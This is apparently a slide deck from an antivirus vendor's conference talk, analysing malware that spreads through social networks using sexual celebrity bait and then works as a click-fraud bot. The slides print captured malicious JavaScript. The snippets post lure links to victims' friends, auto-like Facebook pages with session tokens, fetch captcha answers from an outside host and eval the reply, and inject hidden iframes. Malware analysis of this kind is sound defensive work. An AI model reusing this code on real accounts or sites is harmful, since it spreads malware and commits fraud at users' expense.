Today, social sites make up a big, open vector for people who want monetize their ideas. But sometimes those ideas are not as legitimate as one would hope. One of the more unscrupulous ways to “earn” money is to steal your identity, email accounts, and/or credit card details. Another way is to misuse your computer as a money-making machine for cybercriminals.
Presented at AVAR 2013 by Jan Sirmer and Lukas Hasik, Virus Analysts & Researchers at Avast Software.
18. Change setting in browser
TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch default string
TestAddon.date user set string 1340624313
TestAddon.guid user set string 3c94f90903f031a799162872a55742e8
TestAddon.int user set string 60
TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
20. js_f.php
• Two different ways
1. Spreading malware to other people and works as a clicker
2. Only clicker
21. Spreading malware
• Script updates the victim’s Facebook and twitter status by
posting new status messages
22. Spreading malware
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating
on hidden camera", "It happened in United Stateshotel",
"http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "",
"20", "friend", "327065014030715", "431402153539537",
"AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {
var randomnumber = Math.floor(Math.random() * 100);
if (randomnumber > 0) {
23. Spreading malware
var uri = "http://tol.co/5q";
if ((document.location.href.search("tagged.com") > -1)) {
var ids = get_friends_t(1);
if (ids.length > 0) {
for (var i in ids) {
send_msg(uri, ids[i], "2222")
}
} else {
post_item("LOL Miley Cyrus got caught having s3x
" + uri, "2222")
}
}
24. Functionality
function likepage(pageid) {
var likepost = "fbpage_id=" + pageid +
"&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet
_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt +
"&lsd&post_form_id_source=AsyncRequest";
var likepage = new XMLHttpRequest();
likepage.open("POST", "/ajax/pages/fan_status.php?
__a=1");
likepage.send(likepost)
}
25. Functionality
function get_online_friends(limit) {
var friends = get_friends(limit);
var friends = make_array(friends);
friends.sort();
var postfields = "user=" + uid;
for (var i = 0; i < friends.length; i++) {
postfields += "&available_user_info_ids[" + i + "]=" +
friends[i]
}
26. Functionality
function get_solved_captcha(extra_challenge_params, opt)
{
var output = new Array(3);
var post = new XMLHttpRequest();
post.open("GET",
"http://mp56a.com/fn/cs/api/s_c.php?u=" +
escape(extra_challenge_params), false);
post.send();
if (post.readyState == 4 && post.status == 200) {
data = eval('(' + post.responseText + ')');
console.log(data);
post[1] = data.key;
post[2] = data.challenge
}
27. Create injected iframe
function createIframe(src) {
var ifr = document.createElement("iframe");
ifr.setAttribute("src", src);
ifr.style.position = "absolute";
ifr.style.top = "0";
ifr.style.left = "0";
ifr.style.width = "100%";
ifr.style.height = "100%";
document.body.appendChild(ifr)
}
function get_img_src(src, no) {
x = src.getElementsByTagName("img");
return x[no].id
}
function make_dom(src) {
var tempDiv = document.createElement("div");
tempDiv.innerHTML = src;
return tempDiv
}
28. Clicker
• BHO, Firefox and Chrome payloads contain link to site like
http://resultsz.com/search/anticheat6.php?username=foreste
• There is hosted list of sites used by all of those “clickers” for
injecting hidden iframe with every visited site and earning
money to the blackhat.
29. Summary
• Be aware of social engineering
– Even simple attempts can be successful
• Social networks are used for spreading malware
– More user == more efficiency
• Trendy topics, celebrities and latest news are often start
point for these infection vectors
31. Thank you
Jan Sirmer (sirmer@avast.com)
Senior Virus Analyst
Lukas Hasik (hasik@avast.com)
QA Director
Editor's Notes
predstaveni
1)User click on Kirsten’s video
2)There is a malware
3)Malware secretly inject user’s PC
4)Malware communicate with C&C where receive a list of sites where to click
5)Malware clicks on received sites
6)Bad guy receive money
Inside jstest.js are many links to different sites that are visited by user’s browser and the attacker gains money from clicks.